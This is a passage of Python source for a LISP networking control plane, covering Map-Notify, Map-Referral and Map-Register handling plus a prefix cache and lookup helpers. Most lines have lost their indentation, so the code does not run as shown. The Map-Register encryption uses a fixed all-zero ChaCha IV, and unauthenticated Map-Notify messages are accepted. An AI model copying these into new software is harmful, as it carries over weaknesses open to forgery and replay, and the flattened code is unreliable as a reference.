rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False),
rloc.rle.print_rle(False, True)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
    # Get map-server so we can do statistics and find the auth-key, if an
    # auth-key was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
    # in this site. There is probably an RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
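#
# lisp_walk_eid_records_sketch
#
# Illustrative sketch, not called anywhere: the record-walking skeleton the
# Map-Register and Map-Notify handlers above share. Walk record_count
# EID-records and, within each, rloc_count RLOC-records, bailing out whenever
# a decode returns None.
#
def lisp_walk_eid_records_sketch(packet, record_count):
    for i in range(record_count):
        eid_record = lisp_eid_record()
        packet = eid_record.decode(packet)
        if (packet == None): return(None)
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            packet = rloc_record.decode(packet, None)
            if (packet == None): return(None)
        #endfor
    #endfor
    return(packet)
#enddef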
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
    #endif
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (key_id in site.auth_key):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
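#
# lisp_map_referral_loop_sketch
#
# Illustrative sketch, not called anywhere: the loop test above in isolation.
# A referral returning 10.0.0.0/8 after 10.1.0.0/16 was already cached is not
# more-specific, so this returns True and the referral would be treated as a
# loop. lisp_address is defined later in this file; names resolve at call
# time.
#
def lisp_map_referral_loop_sketch():
    cached = lisp_address(LISP_AFI_IPV4, "", 0, 0)
    cached.store_prefix("10.1.0.0/16")
    arrived = lisp_address(LISP_AFI_IPV4, "", 0, 0)
    arrived.store_prefix("10.0.0.0/8")
    return(cached.is_more_specific(arrived))
#enddef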
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (s in referral.referral_set):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
        # Set dirty-bit so we can remove referral-nodes from the cached
        # entry that weren't in the packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (addr_str not in referral.referral_set):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (addr_str in dirty_set): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (s in referral.referral_set):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
timestamp = time.time()
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1, timestamp)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authentication for Map-Register message and send it to the supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters. Use 20 rounds so the decrypter can interoperate
# with ct-lisp mobile platforms.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv, 20).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be sourced from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if the NAT-traversal configured, use same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
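#
# lisp_auth_digest_sketch
#
# Illustrative sketch, not used by the code: the HMAC computations these
# alg-id constants imply, with LISP_AUTH_SHA1 paired with HMAC-SHA1 and
# LISP_AUTH_SHA2 with HMAC-SHA256. The authoritative logic lives in
# lisp_compute_auth() and lisp_verify_auth() elsewhere in this file.
#
def lisp_auth_digest_sketch(alg_id, password, packet):
    import hmac
    if (alg_id == LISP_AUTH_SHA1):
        return(hmac.new(password.encode(), packet, hashlib.sha1).digest())
    #endif
    if (alg_id == LISP_AUTH_SHA2):
        return(hmac.new(password.encode(), packet, hashlib.sha256).digest())
    #endif
    return(None)
#enddef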
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
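#
# byte_swap_64_struct
#
# Equivalent sketch for clarity, not used by the code: packing the value
# big-endian and unpacking it little-endian performs the same 64-bit byte
# swap as the shift-and-mask expression above.
#
def byte_swap_64_struct(address):
    return(struct.unpack("<Q", struct.pack(">Q", address))[0])
#enddef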
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries(object):
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache(object):
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (ml not in self.cache):
self.cache[ml] = lisp_cache_entries()
self.cache_sorted = self.sort_in_entry(self.cache_sorted, ml)
#endif
if (key not in self.cache[ml].entries):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (ml_key not in self.cache): return(None)
if (key not in self.cache[ml_key].entries): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry in list(self.cache[ml].entries.values()):
if (prefix.is_more_specific(entry.eid)):
if (found == None or
entry.eid.is_more_specific(found.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (ml not in self.cache): return
if (key not in self.cache[ml].entries): return
self.cache[ml].entries.pop(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for entry in list(self.cache[ml].entries.values()):
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def sort_in_entry(self, table, value):
if (table == []): return([value])
t = table
while (True):
if (len(t) == 1):
if (value == t[0]): return(table)
index = table.index(t[0])
if (value < t[0]):
return(table[0:index] + [value] + table[index::])
#endif
if (value > t[0]):
return(table[0:index+1] + [value] + table[index+1::])
#endif
#endif
index = old_div(len(t), 2)
t = t[0:index] if (value < t[index]) else t[index::]
#endwhile
return([])
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
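#
# lisp_cache_usage_sketch
#
# Illustrative sketch, not called anywhere: exercising the longest-match
# lookup above. For non-exact lookups an entry only needs an 'eid'
# attribute, so a minimal stand-in object is used here in place of the real
# lisp_mapping()/lisp_site_eid() entries. lisp_address is defined later in
# this file; names resolve at call time.
#
def lisp_cache_usage_sketch():
    cache = lisp_cache()
    prefix = lisp_address(LISP_AFI_IPV4, "", 0, 0)
    prefix.store_prefix("10.0.0.0/8")
    class entry_stub(object): pass
    entry = entry_stub()
    entry.eid = prefix
    cache.add_cache(prefix, entry)
    host = lisp_address(LISP_AFI_IPV4, "10.1.1.1", 32, 0)
    return(cache.lookup_cache(host, False))
#enddef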
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
    # more-specifics, this entry will not be returned if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
    # not find 2.2.2.2, what is returned is 224.1.1.1/32 and not 224.0.0.0/4.
    #
    # So we will look at the returned entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a Python peculiarity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address(object):
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
